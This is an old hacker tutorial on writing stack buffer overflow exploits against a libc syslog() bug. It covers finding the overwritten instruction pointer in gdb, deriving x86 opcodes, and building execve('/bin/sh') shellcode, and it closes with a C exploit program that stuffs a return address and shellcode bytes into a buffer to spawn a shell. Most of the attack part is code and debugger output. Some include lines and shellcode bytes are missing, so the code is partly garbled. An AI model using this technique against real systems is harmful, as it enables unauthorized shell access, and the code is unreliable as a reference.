How_to_write_Buffer_Overflows
How_to_write_Buffer_Overflows
--------syslog_test_1.c------------
#include
char buffer[4028];
void main() {
int i;
syslog(LOG_ERR, buffer);
}
--------end syslog_test_1.c----------
Compile the program and run it. Make sure you include the symbol table for the debugger or not... depending
upon how macho you feel today.
bash$ gcc -g buf.c -o buf
bash$ buf
Segmentation fault (core dumped)
The 'Segmentation fault (core dumped)' is what we wanted to see. This tells us there is definately an attempt
to access some memory address that we shouldn't. If you do much in 'C' with pointers on a unix machine you
have probably seen this (or Bus error) when pointing or dereferencing incorrectly.
Fire up gdb on the program (with or without the core file). Assuming you remove the core file (this way you
can learn a bit about gdb), the steps would be as follows:
Ok, this is good. The 41's you see are the hex equivallent for the ascii character 'A'. We are definately going
places where we shouldn't be.
(gdb) info all-registers
eax 0xefbfd641 -272640447
ecx 0x00000000 0
edx 0xefbfd67c -272640388
ebx 0xefbfe000 -272637952
esp 0xefbfd238 0xefbfd238
ebp 0xefbfde68 0xefbfde68
esi 0xefbfd684 -272640380
edi 0x0000cce8 52456
eip 0x00001273 0x1273
ps 0x00010212 66066
cs 0x0000001f 31
ss 0x00000027 39
ds 0x00000027 39
es 0x00000027 39
fs 0x00000027 39
gs 0x00000027 39
The gdb command 'info all-registers' shows the values in the current hardware registers. The one we are
really interested in is 'eip'. On some platforms this will be called 'ip' or 'pc'. It is the Instruction Pointer [also
called Program Counter]. It points to the memory location of the next instruction the processor will execute.
By overwriting this you can point to the beginning of your own code and the processor will merrily start
executing it assuming you have it written as native opcodes and operands.
In the above we haven't gotten exactly where we need to be yet. If you want to see where it crashed out do
the following:
If you are familiar with microsoft assembler this will be a bit backwards to you. For example: in microsoft
you would 'mov ax,cx' to move cx to ax. In AT&T 'mov ax,cx' moves ax to cx. So put on those warp
refraction eye-goggles and on we go.
let's go back and tweak the original source code some eh?
-------------syslog_test_2.c-------------
#include
char buffer[4028];
void main() {
int i;
syslog(LOG_ERR, buffer);
}
-----------end syslog_test_2.c-------------
Now we move it along until we figure out where eip lives in the overflow (which is right after ebp in this
arch architecture). With that known fact we only have to add 4 more bytes to our buffer of 'A''s and we will
overwrite eip completely.
---------syslog_test_3.c----------------
#include
char buffer[4028];
void main() {
int i;
syslog(LOG_ERR, buffer);
}
-------end syslog_test_3.c------------
bash$ !gc
gcc -g buf.c -o buf
bash$ gdb buf
(gdb) run
Starting program: /usr2/home/syslog/buf
BINGO!!!
Here's where it starts to get interesting. Now that we know eip starts at buffer[2024] and goes through buffer
[2027] we can load it up with whatever we need. The question is... what do we need?
On the Intel x86 architecture [a pentium here but that doesn't matter] incl %eax is opcode 0100 0001 or
41hex. addb %al,(%eax) is 0000 0000 or 0x0 hex. We will load up buffer[2024] to buffer[2027] with the
address of 0xc73c where we will start our code. You have two options here, one is to load the buffer up with
the opcodes and operands and point the eip back into the buffer; the other option is what we are going to be
doing which is to put the opcodes and operands after the eip and point to them.
The advantage to putting the code inside the buffer is that other than the ebp and eip registers you don't
clobber anything else. The disadvantage is that you will need to do trickier coding (and actually write the
assembly yourself) so that there are no bytes that contain 0x0 which will look like a null in the string. This
will require you to know enough about the native chip architecture and opcodes to do this [easy enough for
some people on Intel x86's but what happens when you run into an Alpha? -- lucky for us there is a gdb for
Alpha I think ;-)].
The advantage to putting the code after the eip is that you don't have to worry about bytes containing 0x0 in
them. This way you can write whatever program you want to execute in 'C' and have gdb generate most of
the machine code for you. The disadvantage is that you are overwriting the great unknown. In most cases the
section you start to overwrite here contains your environment variables and other whatnots.... upon
succesfully running your created code you might be dropped back into a big void. Deal with it.
The safest instruction is NOP which is a benign no-operation. This is what you will probably be loading the
buffer up with as filler.
Ahhh but what if you don't know what the opcodes are for the particular architecture you are on. No problem.
gcc has a wonderfull function called __asm__(char *); I rely upon this heavily for doing buffer overflows on
architectures that I don't have assembler books for.
------nop.c--------
void main(){
__asm__("nop\n");
}
----end nop.c------
Since nop is at 0x1083 and the next instruction is at 0x1084 we know that nop only takes up one byte.
Examining that byte shows us that it is 0x90 (hex).
------ syslog_test_4.c---------
#include
char buffer[4028];
void main() {
int i;
i=2024;
buffer[i++]=0x3c;
buffer[i++]=0xc7;
buffer[i++]=0x00;
buffer[i++]=0x00;
syslog(LOG_ERR, buffer);
}
------end syslog_test_4.c-------
Notice you need to load the eip backwards ie 0000c73c is loaded into the buffer as 3c c7 00 00.
Now the question we have is what is the code we insert from here on?
Suppose we want to run /bin/sh? Gee, I don't have a friggin clue as to why someone would want to do
something like this, but I hear there are a lot of nasty people out there. Oh well. Here's the proggie we want to
execute in C code:
------execute.c--------
#include
main()
{
char *name[2];
name[0] = "sh";
name[1] = NULL;
execve("/bin/sh",name,NULL);
}
----end execute.c-------
Ok, the program works. Then again, if you couldn't whip up that little prog you should probably throw in the
towel here. Maybe become a webmaster or something that requires little to no programming (or brainwave
activity period). Here's the gdb scoop:
bash$ gdb execute
(gdb) disassemble main
Dump of assembler code for function main:
to 0x10b8:
0x1088 : pushl %ebp
0x1089 : movl %esp,%ebp
0x108b : subl $0x8,%esp
0x108e : movl $0x1080,0xfffffff8(%ebp)
0x1095 : movl $0x0,0xfffffffc(%ebp)
0x109c : pushl $0x0
0x109e : leal 0xfffffff8(%ebp),%eax
0x10a1 : pushl %eax
0x10a2 : pushl $0x1083
0x10a7 : call 0x10b8
0x10ac : leave
0x10ad : ret
0x10ae : addb %al,(%eax)
0x10b0 : jmp 0x1140
0x10b5 : addb %al,(%eax)
0x10b7 : addb %cl,0x3b05(%ebp)
End of assembler dump.
This is the assembly behind what our execute program does to run /bin/sh. We use execve() as it is a system
call and this is what we are going to have our program execute (ie let the kernel service run it as opposed to
having to write it from scratch).
0x1083 contains the /bin/sh string and is the last thing pushed onto the stack before the call to execve.
(0x1080 contains the arguments...which I haven't been able to really clean up).
We will replace this address with the one where our string lives [when we decide where that will be].
[main]
0x108d : movl %esp,%ebp
[execve]
0x10b8 : leal 0x3b,%eax
0x10be : lcall 0x7,0x0
All you need to do from here is to build up a bit of an environment for the program. Some of this stuff isn't
necesary but I have it in still as I haven't fine tuned this yet.
I clean up eax. I don't remember why I do this and it shouldn't really be necesarry. Hell, better quit hitting the
xorl %eax,%eax
We will encapsulate the actuall program with a jmp to somewhere and a call right back to the instruction after
the jmp. This pushes ecx and esi onto the stack.
jmp 0x???? # this will jump to the call...
popl %esi
popl %ecx
----------------------------------------------------------------------
movl %esp,%ebp
xorl %eax,%eax
jmp 0x???? # we don't know where yet...
# -------------[main]
movl $0x????,0xfffffff8(%ebp) # we don't know what the address will
# be yet.
movl $0x0,0xfffffffc(%ebp)
pushl $0x0
leal 0xfffffff8(%ebp),%eax
pushl %eax
pushl $0x???? # we don't know what the address will
# be yet.
# ------------[execve]
leal 0x3b,%eax
lcall 0x7,0x0
----------------------------------------------------------------------
There are only a couple of more things that we need to add before we fill in the addresses to a couple of the
instructions.
Since we aren't actually calling execve with a 'call' anymore here, we need to push the value in ecx onto the
stack to simulate it.
# ------------[execve]
pushl %ecx
leal 0x3b,%eax
lcall 0x7,0x0
The only other thing is to not pass in the arguments to /bin/sh. We do this by changing the ' leal 0xfffffff8(%
ebp),%eax' to ' leal 0xfffffffc(%ebp),%eax' [remember 0x0 was moved there].
So the whole thing looks like this (without knowing the addresses for the '/bin/sh\0' string):
movl %esp,%ebp
xorl %eax,%eax # we added this
jmp 0x???? # we added this
popl %esi # we added this
popl %ecx # we added this
movl $0x????,0xfffffff5(%ebp)
movl $0x0,0xfffffffc(%ebp)
pushl $0x0
leal 0xfffffffc(%ebp),%eax # we changed this
pushl %eax
pushl $0x????
leal 0x3b,%eax
pushl %ecx # we added this
lcall 0x7,0x0
call 0x???? # we added this
To figure out the bytes to load up our buffer with for the parts that were already there run gdb on the execute
program.
Now we know that buffer[2028]=0x89 and buffer[2029]=0xe5. Do this for all of the instructions that we are
pulling out of the execute program. You can figure out the basic structure for the call command by looking at
the one inexecute that calls execve. Of course you will eventually need to put in the proper address.
When I work this out I break down the whole program so I can see what's going on. Something like the
following
For commands that you don't know the opcodes to you can find them out for the particular chip you are on by
writing little scratch programs.
----pop.c-------
void main() {
__asm__("popl %esi\n");
}
---end pop.c----
0x1085 : ret
0x1086 : addb %al,(%eax)
End of assembler dump.
(gdb) x/bx 0x1083
0x1083 : 0x5e
So, 0x5e is popl %esi. You get the idea. After you have gotten this far build the string up (put in bogus
addresses for the ones you don't know in the jmp's and call's... just so long as we have the right amount of
space being taken up by the jmp and call instructions... likewise for the movl's where we will need to know
the memory location of 'sh\0\0/bin/sh\0'.
After you have built up the string, tack on the chars for sh\0\0/bin/sh\0.
Compile the program and load it into gdb. Before you run it in gdb set a break point for the syslog call.
Look for the last instruction in your code. In this case it was the 'call' to right after the 'jmp' near the
beginning. Our data should be right after it and indeed we see that it is.
(gdb) x/13bc 0xc770
0xc770 : 115 's' 104 'h' 0 '\000' 47 '/'
98 'b' 105 'i' 110 'n' 47 '/'
0xc778 : 115 's' 104 'h' 0 '\000' 0 '\000' 0 '\000'
Now go back into your code and put the appropriate addresses in the movl and pushl. At this point you
should also be able to put in the appropriate operands for the jmp and call. Congrats... you are done. Here's
what the output will look like when you run this on a system with the non patched libc/syslog bug.
bash$ buf
$ exit (do whatever here... you spawned a shell!!!!!! yay!)
bash$
#include
char buffer[4028];
void main () {
int i;
buffer[2024]=0x3c;
buffer[2025]=0xc7;
buffer[2026]=0x00;
buffer[2027]=0x00;
i=2028;
buffer[i++]=0x00;
#ifdef z_out
buffer[i++]=0x8d; /* leal 0xfffffff8(%ebp),%eax */
buffer[i++]=0x45;
buffer[i++]=0xf8;
#endif
buffer[i++]=0x00;
buffer[i++]=0x07;
buffer[i++]=0x00;
buffer[i++]='s';
buffer[i++]='h';
buffer[i++]=0x00;
buffer[i++]='/';
buffer[i++]='b';
buffer[i++]='i';
buffer[i++]='n';
buffer[i++]='/';
buffer[i++]='s';
buffer[i++]='h';
buffer[i++]=0x00;
buffer[i++]=0x00;
syslog(LOG_ERR, buffer);
}